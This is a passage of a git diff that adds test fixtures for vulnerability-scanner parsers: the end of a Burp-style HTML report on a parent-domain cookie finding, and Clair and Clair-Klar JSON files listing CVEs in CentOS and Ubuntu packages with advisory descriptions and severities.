    HTTP/1.1 301 Moved Permanently +Date: Sat, 11 Jun 2022 07:00:37 GMT +Connection: close +Cache-Control: max-age=3600 +Expires: Sat, 11 Jun 2022 08:00:37 GMT +Location: https://example.com/login +Report-To: {"endpoints":[{"url":"https:\/\/redacted.com\/report\/v3?s=%2F%2B0j4iAiIhKtlxfKUYRRvGBw1A3CoB8kliM2XyzsJvn3k%2BclSaArx8aLpFKX9A4mzLetuBJjeizmhrt5uLVNbpHqg5OIa%2B%2By8ci4AnmMoFVaR2izPeSz3z7iifpcca9GK%2BnkBk4N"}],"group":"cf-nel","max_age":604800} +NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} +Vary: Accept-Encoding +Set-Cookie: __cfruid=d8bd325d60ec6072ebaf4ebdf5385a328bf88620-1654930837; path=/; domain=.redacted.com; HttpOnly +Server: redacted +CF-RAY: 719878863c0f611a-SEA +Content-Length: 0 + +
    + +
    + +

    Cookie scoped to parent domain

    +/redacted + +

    Issue detail:

    +
    +The following cookie was issued by the application and is scoped to a parent of the issuing domain:
    • __cfruid
    The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function. +
    + +

    +Issue background +

    +
    +

    A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

    +
    + +

    +Issue remediation +

    +
    +

    By default, cookies are scoped to the issuing domain, and on IE/Edge to subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems that support those applications.

    +
    + +

    Vulnerability classifications

    + + +

    Request:

    +
    GET /redacted HTTP/1.1 +Host: https://example.com +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Upgrade-Insecure-Requests: 1 +Accept-Encoding: gzip, deflate +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +Connection: close +Cache-Control: max-age=0 + +
    +

    Response:

    +
    HTTP/1.1 301 Moved Permanently +Date: Sat, 11 Jun 2022 07:00:38 GMT +Connection: close +Cache-Control: max-age=3600 +Expires: Sat, 11 Jun 2022 08:00:38 GMT +Location: https://example.com/query +Report-To: {"endpoints":[{"url":"https:\/\/redacted.com\/report\/v3?s=GITu%2FNkeUJ7i4GNvI8eqYIL8PI8PhziTbWEkjnRpK5ZqLqoUhNYcNBik1jzvHozRQg91RPLgFSl4Xdh1Yc6z%2Bch1htbvWD48lpVK4FO%2BLrybGXSUNTc7iDGy1yRu3745H7hflz4W"}],"group":"cf-nel","max_age":604800} +NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} +Vary: Accept-Encoding +Set-Cookie: __cfruid=8d467a9836d19fd26dfe28fbf19907453cba442d-1654930838; path=/; domain=.redacted.com; HttpOnly +Server: redacted +CF-RAY: 7198788f9990611a-SEA +Content-Length: 0 + +
    + +
    + +

    Cookie scoped to parent domain

    +/redacted + +

    Issue detail:

    +
    +The following cookie was issued by the application and is scoped to a parent of the issuing domain:
    • __cfruid
    The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function. +
    + +

    +Issue background +

    +
    +

    A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

    +
    + +

    +Issue remediation +

    +
    +

    By default, cookies are scoped to the issuing domain, and on IE/Edge to subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems that support those applications.

    +
    + +

    Vulnerability classifications

    + + +

    Request:

    +
    GET /redacted HTTP/1.1 +Host: https://example.com +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Upgrade-Insecure-Requests: 1 +Accept-Encoding: gzip, deflate +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +Connection: close +Cache-Control: max-age=0 + +
    +

    Response:

    +
    HTTP/1.1 301 Moved Permanently +Date: Sat, 11 Jun 2022 07:01:40 GMT +Connection: close +Cache-Control: max-age=3600 +Expires: Sat, 11 Jun 2022 08:01:40 GMT +Location: https://example.com/settings +Report-To: {"endpoints":[{"url":"https:\/\/redacted.com\/report\/v3?s=TOW3kVkXp0bQxMYOOZT7OMzLRtYV6%2FXOyYqp9xIhzJLiSAhal9Kjiko6HpWytDihL7fQx3esZQiCibP5337D%2FSZKaZ1IOXiFT10xheOjwURaL6hW%2BzOcUa0AArPFOf54aerC8ZdK"}],"group":"cf-nel","max_age":604800} +NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} +Vary: Accept-Encoding +Set-Cookie: __cfruid=c5070c5ee4b26bb8d7c32b51ade8b2dbe7f31828-1654930900; path=/; domain=.redacted.com; HttpOnly +Server: redacted +CF-RAY: 71987a1159355fda-SEA +Content-Length: 0 + +
    + +
    +
    + +
    + +
    + + \ No newline at end of file diff --git a/unittests/scans/clair-klar/empty.json b/unittests/scans/clair-klar/empty.json new file mode 100644 index 00000000000..1c7e82aa3f5 --- /dev/null +++ b/unittests/scans/clair-klar/empty.json @@ -0,0 +1,4 @@ +{ + "LayerCount": 9, + "Vulnerabilities": {} +} \ No newline at end of file diff --git a/unittests/scans/clair-klar/high.json b/unittests/scans/clair-klar/high.json new file mode 100644 index 00000000000..6db85a4e82d --- /dev/null +++ b/unittests/scans/clair-klar/high.json @@ -0,0 +1,67 @@ +{ + "LayerCount": 9, + "Vulnerabilities": { + "High": [ + { + "Name": "RHSA-2019:0109", + "NamespaceName": "centos:7", + "Description": "Perl is a high-level programming language that is commonly used for system administration utilities and web programming. Security Fies): * perl: Integer overflow leading to buffer overflow in Perl_my_setenv() (CVE-2018-18311) For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section. Red Hat would like to thank the Perl project for reporting this issue. Upstream acknowledges Jayakrishna Menon as the original reporter.", + "Link": "https://access.redhat.com/errata/RHSA-2019:0109", + "Severity": "High", + "FixedBy": "4:5.16.3-294.el7_6", + "FeatureName": "perl-libs", + "FeatureVersion": "4:5.16.3-293.el7" + }, + { + "Name": "RHSA-2019:0109", + "NamespaceName": "centos:7", + "Description": "Perl is a high-level programming language that is commonly used for system administration utilities and web programming. Security Fies): * perl: Integer overflow leading to buffer overflow in Perl_my_setenv() (CVE-2018-18311) For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section. Red Hat would like to thank the Perl project for reporting this issue. Upstream acknowledges Jayakrishna Menon as the original reporter.", + "Link": "https://access.redhat.com/errata/RHSA-2019:0109", + "Severity": "High", + "FixedBy": "1:1.04-294.el7_6", + "FeatureName": "perl-Pod-Escapes", + "FeatureVersion": "1:1.04-293.el7" + }, + { + "Name": "RHSA-2019:0049", + "NamespaceName": "centos:7", + "Description": "The systemd packages contain systemd, a system and service manager for Linux, compatible with the SysV and LSB init scripts. It provides aggressive parallelism capabilities, uses socket and D-Bus activation for starting services, offers on-demand starting of daemons, and keeps track of processes using Linux cgroups. In addition, it supports snapshotting and restoring of the system state, maintains mount and automount points, and implements an elaborate transactional dependency-based service control logic. It can also work as a drop-in replacement for sysvinit. Security Fies): * systemd: Out-of-bounds heap write in systemd-networkd dhcpv6 option handling (CVE-2018-15688) * systemd: stack overflow when calling syslog from a command with long cmdline (CVE-2018-16864) * systemd: stack overflow when receiving many journald entries (CVE-2018-16865) For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section. Red Hat would like to thank Ubuntu Security Team for reporting CVE-2018-15688 and Qualys Research Labs for reporting CVE-2018-16864 and CVE-2018-16865. Upstream acknowledges Felix Wilhelm (Google) as the original reporter of CVE-2018-15688.", + "Link": "https://access.redhat.com/errata/RHSA-2019:0049", + "Severity": "High", + "FixedBy": "0:219-62.el7_6.2", + "FeatureName": "systemd-libs", + "FeatureVersion": "219-62.el7" + }, + { + "Name": "RHSA-2019:0109", + "NamespaceName": "centos:7", + "Description": "Perl is a high-level programming language that is commonly used for system administration utilities and web programming. Security Fies): * perl: Integer overflow leading to buffer overflow in Perl_my_setenv() (CVE-2018-18311) For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section. Red Hat would like to thank the Perl project for reporting this issue. Upstream acknowledges Jayakrishna Menon as the original reporter.", + "Link": "https://access.redhat.com/errata/RHSA-2019:0109", + "Severity": "High", + "FixedBy": "4:5.16.3-294.el7_6", + "FeatureName": "perl", + "FeatureVersion": "4:5.16.3-293.el7" + }, + { + "Name": "RHSA-2019:0049", + "NamespaceName": "centos:7", + "Description": "The systemd packages contain systemd, a system and service manager for Linux, compatible with the SysV and LSB init scripts. It provides aggressive parallelism capabilities, uses socket and D-Bus activation for starting services, offers on-demand starting of daemons, and keeps track of processes using Linux cgroups. In addition, it supports snapshotting and restoring of the system state, maintains mount and automount points, and implements an elaborate transactional dependency-based service control logic. It can also work as a drop-in replacement for sysvinit. Security Fies): * systemd: Out-of-bounds heap write in systemd-networkd dhcpv6 option handling (CVE-2018-15688) * systemd: stack overflow when calling syslog from a command with long cmdline (CVE-2018-16864) * systemd: stack overflow when receiving many journald entries (CVE-2018-16865) For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section. Red Hat would like to thank Ubuntu Security Team for reporting CVE-2018-15688 and Qualys Research Labs for reporting CVE-2018-16864 and CVE-2018-16865. Upstream acknowledges Felix Wilhelm (Google) as the original reporter of CVE-2018-15688.", + "Link": "https://access.redhat.com/errata/RHSA-2019:0049", + "Severity": "High", + "FixedBy": "0:219-62.el7_6.2", + "FeatureName": "systemd", + "FeatureVersion": "219-62.el7" + }, + { + "Name": "RHSA-2019:0109", + "NamespaceName": "centos:7", + "Description": "Perl is a high-level programming language that is commonly used for system administration utilities and web programming. Security Fies): * perl: Integer overflow leading to buffer overflow in Perl_my_setenv() (CVE-2018-18311) For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section. Red Hat would like to thank the Perl project for reporting this issue. Upstream acknowledges Jayakrishna Menon as the original reporter.", + "Link": "https://access.redhat.com/errata/RHSA-2019:0109", + "Severity": "High", + "FixedBy": "4:5.16.3-294.el7_6", + "FeatureName": "perl-macros", + "FeatureVersion": "4:5.16.3-293.el7" + } + ] + } +} \ No newline at end of file diff --git a/unittests/scans/clair-klar/mixed.json b/unittests/scans/clair-klar/mixed.json new file mode 100644 index 00000000000..c6500d1219b --- /dev/null +++ b/unittests/scans/clair-klar/mixed.json @@ -0,0 +1,77 @@ +{ + "LayerCount": 9, + "Vulnerabilities": { + "Defcon1": [ + { + "Name": "RHSA-2019:0109", + "NamespaceName": "centos:7", + "Description": "Perl is a high-level programming language that is commonly used for system administration utilities and web programming. Security Fies): * perl: Integer overflow leading to buffer overflow in Perl_my_setenv() (CVE-2018-18311) For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section. Red Hat would like to thank the Perl project for reporting this issue. Upstream acknowledges Jayakrishna Menon as the original reporter.", + "Link": "https://access.redhat.com/errata/RHSA-2019:0109", + "Severity": "Defcon1", + "FixedBy": "4:5.16.3-294.el7_6", + "FeatureName": "perl-libs", + "FeatureVersion": "4:5.16.3-293.el7" + } + ], + "Critical": [ + { + "Name": "RHSA-2019:0049", + "NamespaceName": "centos:7", + "Description": "The systemd packages contain systemd, a system and service manager for Linux, compatible with the SysV and LSB init scripts. It provides aggressive parallelism capabilities, uses socket and D-Bus activation for starting services, offers on-demand starting of daemons, and keeps track of processes using Linux cgroups. In addition, it supports snapshotting and restoring of the system state, maintains mount and automount points, and implements an elaborate transactional dependency-based service control logic. It can also work as a drop-in replacement for sysvinit. Security Fies): * systemd: Out-of-bounds heap write in systemd-networkd dhcpv6 option handling (CVE-2018-15688) * systemd: stack overflow when calling syslog from a command with long cmdline (CVE-2018-16864) * systemd: stack overflow when receiving many journald entries (CVE-2018-16865) For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section. Red Hat would like to thank Ubuntu Security Team for reporting CVE-2018-15688 and Qualys Research Labs for reporting CVE-2018-16864 and CVE-2018-16865. Upstream acknowledges Felix Wilhelm (Google) as the original reporter of CVE-2018-15688.", + "Link": "https://access.redhat.com/errata/RHSA-2019:0049", + "Severity": "Critical", + "FixedBy": "0:219-62.el7_6.2", + "FeatureName": "systemd-libs", + "FeatureVersion": "219-62.el7" + } + ], + "High": [ + { + "Name": "RHSA-2019:0109", + "NamespaceName": "centos:7", + "Description": "Perl is a high-level programming language that is commonly used for system administration utilities and web programming. Security Fies): * perl: Integer overflow leading to buffer overflow in Perl_my_setenv() (CVE-2018-18311) For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section. Red Hat would like to thank the Perl project for reporting this issue. Upstream acknowledges Jayakrishna Menon as the original reporter.", + "Link": "https://access.redhat.com/errata/RHSA-2019:0109", + "Severity": "High", + "FixedBy": "1:1.04-294.el7_6", + "FeatureName": "perl-Pod-Escapes", + "FeatureVersion": "1:1.04-293.el7" + } + ], + "Medium": [ + { + "Name": "RHSA-2019:0109", + "NamespaceName": "centos:7", + "Description": "Perl is a high-level programming language that is commonly used for system administration utilities and web programming. Security Fies): * perl: Integer overflow leading to buffer overflow in Perl_my_setenv() (CVE-2018-18311) For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section. Red Hat would like to thank the Perl project for reporting this issue. Upstream acknowledges Jayakrishna Menon as the original reporter.", + "Link": "https://access.redhat.com/errata/RHSA-2019:0109", + "Severity": "Medium", + "FixedBy": "4:5.16.3-294.el7_6", + "FeatureName": "perl", + "FeatureVersion": "4:5.16.3-293.el7" + } + ], + "Low": [ + { + "Name": "RHSA-2019:0049", + "NamespaceName": "centos:7", + "Description": "The systemd packages contain systemd, a system and service manager for Linux, compatible with the SysV and LSB init scripts. It provides aggressive parallelism capabilities, uses socket and D-Bus activation for starting services, offers on-demand starting of daemons, and keeps track of processes using Linux cgroups. In addition, it supports snapshotting and restoring of the system state, maintains mount and automount points, and implements an elaborate transactional dependency-based service control logic. It can also work as a drop-in replacement for sysvinit. Security Fies): * systemd: Out-of-bounds heap write in systemd-networkd dhcpv6 option handling (CVE-2018-15688) * systemd: stack overflow when calling syslog from a command with long cmdline (CVE-2018-16864) * systemd: stack overflow when receiving many journald entries (CVE-2018-16865) For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section. Red Hat would like to thank Ubuntu Security Team for reporting CVE-2018-15688 and Qualys Research Labs for reporting CVE-2018-16864 and CVE-2018-16865. Upstream acknowledges Felix Wilhelm (Google) as the original reporter of CVE-2018-15688.", + "Link": "https://access.redhat.com/errata/RHSA-2019:0049", + "Severity": "Low", + "FixedBy": "0:219-62.el7_6.2", + "FeatureName": "systemd", + "FeatureVersion": "219-62.el7" + } + ], + "Unknown": [ + { + "Name": "RHSA-2019:0109", + "NamespaceName": "centos:7", + "Description": "Perl is a high-level programming language that is commonly used for system administration utilities and web programming. Security Fies): * perl: Integer overflow leading to buffer overflow in Perl_my_setenv() (CVE-2018-18311) For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section. Red Hat would like to thank the Perl project for reporting this issue. Upstream acknowledges Jayakrishna Menon as the original reporter.", + "Link": "https://access.redhat.com/errata/RHSA-2019:0109", + "Severity": "Unknown", + "FixedBy": "4:5.16.3-294.el7_6", + "FeatureName": "perl-macros", + "FeatureVersion": "4:5.16.3-293.el7" + } + ] + } +} \ No newline at end of file diff --git a/unittests/scans/clair/empty.json b/unittests/scans/clair/empty.json new file mode 100644 index 00000000000..ee9c14835f2 --- /dev/null +++ b/unittests/scans/clair/empty.json @@ -0,0 +1,5 @@ +{ + "image": "empty:latest", + "unapproved": [], + "vulnerabilities": [] +} \ No newline at end of file diff --git a/unittests/scans/clair/few_vuln.json b/unittests/scans/clair/few_vuln.json new file mode 100644 index 00000000000..717344aa3b7 --- /dev/null +++ b/unittests/scans/clair/few_vuln.json @@ -0,0 +1,82 @@ +{ + "image": "default-docker-3rdparty.bahnhub.tech.rz.db.de:443/ubuntu:bionic-20190912.1", + "unapproved": [ + "CVE-2019-13050", + "CVE-2019-5094", + "CVE-2018-1000654", + "CVE-2016-2781", + "CVE-2019-18224", + "CVE-2019-12290", + "CVE-2018-20482", + "CVE-2019-17543", + "CVE-2017-8283", + "CVE-2019-17594", + "CVE-2019-17595", + "CVE-2018-7738", + "CVE-2016-10228", + "CVE-2018-11237", + "CVE-2016-10739", + "CVE-2019-7309", + "CVE-2018-19591", + "CVE-2018-20796", + "CVE-2019-9192", + "CVE-2018-11236", + "CVE-2015-8985", + "CVE-2019-9169", + "CVE-2009-5155", + "CVE-2019-13627", + "CVE-2019-12904", + "CVE-2017-7246", + "CVE-2017-7245", + "CVE-2017-11164", + "CVE-2018-16868", + "CVE-2018-16869", + "CVE-2018-20839", + "CVE-2019-3844", + "CVE-2019-3843", + "CVE-2013-4235", + "CVE-2018-7169" + ], + "vulnerabilities": [ + { + "featurename": "systemd", + "featureversion": "237-3ubuntu10.29", + "vulnerability": "CVE-2018-20839", + "namespace": "ubuntu:18.04", + "description": "systemd 242 changes the VT1 mode upon a logout, which allows attackers to read cleartext passwords in certain circumstances, such as watching a shutdown, or using Ctrl-Alt-F1 and Ctrl-Alt-F2. This occurs because the KDGKBMODE (aka current keyboard mode) check is mishandled.", + "link": "http://people.ubuntu.com/~ubuntu-security/cve/CVE-2018-20839", + "severity": "Medium", + "fixedby": "" + }, + { + "featurename": "e2fsprogs", + "featureversion": "1.44.1-1ubuntu1.1", + "vulnerability": "CVE-2019-5094", + "namespace": "ubuntu:18.04", + "description": "An exploitable code execution vulnerability exists in the quota file functionality of E2fsprogs 1.45.3. A specially crafted ext4 partition can cause an out-of-bounds write on the heap, resulting in code execution. An attacker can corrupt a partition to trigger this vulnerability.", + "link": "http://people.ubuntu.com/~ubuntu-security/cve/CVE-2019-5094", + "severity": "Medium", + "fixedby": "1.44.1-1ubuntu1.2" + }, + { + "featurename": "glibc", + "featureversion": "2.27-3ubuntu1", + "vulnerability": "CVE-2018-11236", + "namespace": "ubuntu:18.04", + "description": "stdlib/canonicalize.c in the GNU C Library (aka glibc or libc6) 2.27 and earlier, when processing very long pathname arguments to the realpath function, could encounter an integer overflow on 32-bit architectures, leading to a stack-based buffer overflow and, potentially, arbitrary code execution.", + "link": "http://people.ubuntu.com/~ubuntu-security/cve/CVE-2018-11236", + "severity": "Medium", + "fixedby": "" + }, + { + "featurename": "gnupg2", + "featureversion": "2.2.4-1ubuntu1.2", + "vulnerability": "CVE-2019-13050", + "namespace": "ubuntu:18.04", + "description": "Interaction between the sks-keyserver code through 1.2.0 of the SKS keyserver network, and GnuPG through 2.2.16, makes it risky to have a GnuPG keyserver configuration line referring to a host on the SKS keyserver network. Retrieving data from this network may cause a persistent denial of service, because of a Certificate Spamming Attack.", + "link": "http://people.ubuntu.com/~ubuntu-security/cve/CVE-2019-13050", + "severity": "Medium", + "fixedby": "" + } + ] +} \ No newline at end of file diff --git a/unittests/scans/clair/many_vul.json b/unittests/scans/clair/many_vul.json new file mode 100644 index 00000000000..5f47c15c053 --- /dev/null +++ b/unittests/scans/clair/many_vul.json @@ -0,0 +1,392 @@ +{ + "image": "default-docker-3rdparty.bahnhub.tech.rz.db.de:443/ubuntu:bionic-20190912.1", + "unapproved": [ + "CVE-2019-13050", + "CVE-2019-5094", + "CVE-2018-1000654", + "CVE-2016-2781", + "CVE-2019-18224", + "CVE-2019-12290", + "CVE-2018-20482", + "CVE-2019-17543", + "CVE-2017-8283", + "CVE-2019-17594", + "CVE-2019-17595", + "CVE-2018-7738", + "CVE-2016-10228", + "CVE-2018-11237", + "CVE-2016-10739", + "CVE-2019-7309", + "CVE-2018-19591", + "CVE-2018-20796", + "CVE-2019-9192", + "CVE-2018-11236", + "CVE-2015-8985", + "CVE-2019-9169", + "CVE-2009-5155", + "CVE-2019-13627", + "CVE-2019-12904", + "CVE-2017-7246", + "CVE-2017-7245", + "CVE-2017-11164", + "CVE-2018-16868", + "CVE-2018-16869", + "CVE-2018-20839", + "CVE-2019-3844", + "CVE-2019-3843", + "CVE-2013-4235", + "CVE-2018-7169" + ], + "vulnerabilities": [ + { + "featurename": "systemd", + "featureversion": "237-3ubuntu10.29", + "vulnerability": "CVE-2018-20839", + "namespace": "ubuntu:18.04", + "description": "systemd 242 changes the VT1 mode upon a logout, which allows attackers to read cleartext passwords in certain circumstances, such as watching a shutdown, or using Ctrl-Alt-F1 and Ctrl-Alt-F2. This occurs because the KDGKBMODE (aka current keyboard mode) check is mishandled.", + "link": "http://people.ubuntu.com/~ubuntu-security/cve/CVE-2018-20839", + "severity": "Medium", + "fixedby": "" + }, + { + "featurename": "e2fsprogs", + "featureversion": "1.44.1-1ubuntu1.1", + "vulnerability": "CVE-2019-5094", + "namespace": "ubuntu:18.04", + "description": "An exploitable code execution vulnerability exists in the quota file functionality of E2fsprogs 1.45.3. A specially crafted ext4 partition can cause an out-of-bounds write on the heap, resulting in code execution. An attacker can corrupt a partition to trigger this vulnerability.", + "link": "http://people.ubuntu.com/~ubuntu-security/cve/CVE-2019-5094", + "severity": "Medium", + "fixedby": "1.44.1-1ubuntu1.2" + }, + { + "featurename": "glibc", + "featureversion": "2.27-3ubuntu1", + "vulnerability": "CVE-2018-11236", + "namespace": "ubuntu:18.04", + "description": "stdlib/canonicalize.c in the GNU C Library (aka glibc or libc6) 2.27 and earlier, when processing very long pathname arguments to the realpath function, could encounter an integer overflow on 32-bit architectures, leading to a stack-based buffer overflow and, potentially, arbitrary code execution.", + "link": "http://people.ubuntu.com/~ubuntu-security/cve/CVE-2018-11236", + "severity": "Medium", + "fixedby": "" + }, + { + "featurename": "gnupg2", + "featureversion": "2.2.4-1ubuntu1.2", + "vulnerability": "CVE-2019-13050", + "namespace": "ubuntu:18.04", + "description": "Interaction between the sks-keyserver code through 1.2.0 of the SKS keyserver network, and GnuPG through 2.2.16, makes it risky to have a GnuPG keyserver configuration line referring to a host on the SKS keyserver network. Retrieving data from this network may cause a persistent denial of service, because of a Certificate Spamming Attack.", + "link": "http://people.ubuntu.com/~ubuntu-security/cve/CVE-2019-13050", + "severity": "Medium", + "fixedby": "" + }, + { + "featurename": "libidn2", + "featureversion": "2.0.4-1.1build2", + "vulnerability": "CVE-2019-18224", + "namespace": "ubuntu:18.04", + "description": "idn2_to_ascii_4i in lib/lookup.c in GNU libidn2 before 2.1.1 has a heap-based buffer overflow via a long domain string.", + "link": "http://people.ubuntu.com/~ubuntu-security/cve/CVE-2019-18224", + "severity": "Medium", + "fixedby": "2.0.4-1.1ubuntu0.2" + }, + { + "featurename": "libidn2", + "featureversion": "2.0.4-1.1build2", + "vulnerability": "CVE-2019-12290", + "namespace": "ubuntu:18.04", + "description": "GNU libidn2 before 2.2.0 fails to perform the roundtrip checks specified in RFC3490 Section 4.2 when converting A-labels to U-labels. This makes it possible in some circumstances for one domain to impersonate another. By creating a malicious domain that matches a target domain except for the inclusion of certain punycoded Unicode characters (that would be discarded when converted first to a Unicode label and then back to an ASCII label), arbitrary domains can be impersonated.", + "link": "http://people.ubuntu.com/~ubuntu-security/cve/CVE-2019-12290", + "severity": "Medium", + "fixedby": "2.0.4-1.1ubuntu0.2" + }, + { + "featurename": "glibc", + "featureversion": "2.27-3ubuntu1", + "vulnerability": "CVE-2018-19591", + "namespace": "ubuntu:18.04", + "description": "In the GNU C Library (aka glibc or libc6) through 2.28, attempting to resolve a crafted hostname via getaddrinfo() leads to the allocation of a socket descriptor that is not closed. This is related to the if_nametoindex() function.", + "link": "http://people.ubuntu.com/~ubuntu-security/cve/CVE-2018-19591", + "severity": "Medium", + "fixedby": "" + }, + { + "featurename": "glibc", + "featureversion": "2.27-3ubuntu1", + "vulnerability": "CVE-2018-11237", + "namespace": "ubuntu:18.04", + "description": "An AVX-512-optimized implementation of the mempcpy function in the GNU C Library (aka glibc or libc6) 2.27 and earlier may write data beyond the target buffer, leading to a buffer overflow in __mempcpy_avx512_no_vzeroupper.", + "link": "http://people.ubuntu.com/~ubuntu-security/cve/CVE-2018-11237", + "severity": "Medium", + "fixedby": "" + }, + { + "featurename": "libgcrypt20", + "featureversion": "1.8.1-4ubuntu1.1", + "vulnerability": "CVE-2019-13627", + "namespace": "ubuntu:18.04", + "description": "It was discovered that there was a ECDSA timing attack in the libgcrypt20 cryptographic library. Version affected: 1.8.4-5, 1.7.6-2+deb9u3, and 1.6.3-2+deb8u4. Versions fixed: 1.8.5-2 and 1.6.3-2+deb8u7.", + "link": "http://people.ubuntu.com/~ubuntu-security/cve/CVE-2019-13627", + "severity": "Medium", + "fixedby": "" + }, + { + "featurename": "nettle", + "featureversion": "3.4-1", + "vulnerability": "CVE-2018-16869", + "namespace": "ubuntu:18.04", + "description": "A Bleichenbacher type side-channel based padding oracle attack was found in the way nettle handles endian conversion of RSA decrypted PKCS#1 v1.5 data. An attacker who is able to run a process on the same physical core as the victim process, could use this flaw extract plaintext or in some cases downgrade any TLS connections to a vulnerable server.", + "link": "http://people.ubuntu.com/~ubuntu-security/cve/CVE-2018-16869", + "severity": "Low", + "fixedby": "" + }, + { + "featurename": "systemd", + "featureversion": "237-3ubuntu10.29", + "vulnerability": "CVE-2019-3844", + "namespace": "ubuntu:18.04", + "description": "It was discovered that a systemd service that uses DynamicUser property can get new privileges through the execution of SUID binaries, which would allow to create binaries owned by the service transient group with the setgid bit set. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the GID will be recycled.", + "link": "http://people.ubuntu.com/~ubuntu-security/cve/CVE-2019-3844", + "severity": "Low", + "fixedby": "" + }, + { + "featurename": "systemd", + "featureversion": "237-3ubuntu10.29", + "vulnerability": "CVE-2019-3843", + "namespace": "ubuntu:18.04", + "description": "It was discovered that a systemd service that uses DynamicUser property can create a SUID/SGID binary that would be allowed to run as the transient service UID/GID even after the service is terminated. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the UID/GID will be recycled.", + "link": "http://people.ubuntu.com/~ubuntu-security/cve/CVE-2019-3843", + "severity": "Low", + "fixedby": "" + }, + { + "featurename": "gnutls28", + "featureversion": "3.5.18-1ubuntu1.1", + "vulnerability": "CVE-2018-16868", + "namespace": "ubuntu:18.04", + "description": "A Bleichenbacher type side-channel based padding oracle attack was found in the way gnutls handles verification of RSA decrypted PKCS#1 v1.5 data. An attacker who is able to run process on the same physical core as the victim process, could use this to extract plaintext or in some cases downgrade any TLS connections to a vulnerable server.", + "link": "http://people.ubuntu.com/~ubuntu-security/cve/CVE-2018-16868", + "severity": "Low", + "fixedby": "" + }, + { + "featurename": "lz4", + "featureversion": "0.0~r131-2ubuntu3", + "vulnerability": "CVE-2019-17543", + "namespace": "ubuntu:18.04", + "description": "LZ4 before 1.9.2 has a heap-based buffer overflow in LZ4_write32 (related to LZ4_compress_destSize), affecting applications that call LZ4_compress_fast with a large input. (This issue can also lead to data corruption.) NOTE: the vendor states \"only a few specific / uncommon usages of the API are at risk.\"", + "link": "http://people.ubuntu.com/~ubuntu-security/cve/CVE-2019-17543", + "severity": "Low", + "fixedby": "" + }, + { + "featurename": "glibc", + "featureversion": "2.27-3ubuntu1", + "vulnerability": "CVE-2016-10739", + "namespace": "ubuntu:18.04", + "description": "In the GNU C Library (aka glibc or libc6) through 2.28, the getaddrinfo function would successfully parse a string that contained an IPv4 address followed by whitespace and arbitrary characters, which could lead applications to incorrectly assume that it had parsed a valid string, without the possibility of embedded HTTP headers or other potentially dangerous substrings.", + "link": "http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-10739", + "severity": "Low", + "fixedby": "" + }, + { + "featurename": "pcre3", + "featureversion": "2:8.39-9", + "vulnerability": "CVE-2017-11164", + "namespace": "ubuntu:18.04", + "description": "In PCRE 8.41, the OP_KETRMAX feature in the match function in pcre_exec.c allows stack exhaustion (uncontrolled recursion) when processing a crafted regular expression.", + "link": "http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-11164", + "severity": "Low", + "fixedby": "" + }, + { + "featurename": "tar", + "featureversion": "1.29b-2ubuntu0.1", + "vulnerability": "CVE-2018-20482", + "namespace": "ubuntu:18.04", + "description": "GNU Tar through 1.30, when --sparse is used, mishandles file shrinkage during read access, which allows local users to cause a denial of service (infinite read loop in sparse_dump_region in sparse.c) by modifying a file that is supposed to be archived by a different user's process (e.g., a system backup running as root).", + "link": "http://people.ubuntu.com/~ubuntu-security/cve/CVE-2018-20482", + "severity": "Low", + "fixedby": "" + }, + { + "featurename": 